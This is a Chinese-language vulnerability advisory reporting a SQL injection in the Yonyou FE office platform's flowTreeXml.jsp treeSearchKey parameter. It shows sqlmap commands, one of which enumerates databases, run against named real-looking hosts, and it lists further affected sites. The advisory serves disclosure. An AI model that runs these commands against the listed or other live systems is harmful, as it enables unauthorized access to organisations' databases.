用友FE办公平台通用SQL注入

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 用友FE办公平台通用SQL注入 ### 详细说明: 该连接存在SQL注入 /permissionsreport/flowTreeXml.jsp?treeSearchKey=1 sqlmap -u "http://oa.hzuf.com:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1" [<img src="https://images.seebug.org/upload/201408/27112023517614365722160a22ef26e7a8ecd45a.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/27112023517614365722160a22ef26e7a8ecd45a.jpg) sqlmap -u "http://oa.hzuf.com:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1" --dbs [<img src="https://images.seebug.org/upload/201408/272033328e22b92471889e0306c25a3447a243d8.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/272033328e22b92471889e0306c25a3447a243d8.jpg) 5个案例: http://oa.hzuf.com:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1 http://oa.shunhengli.com:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息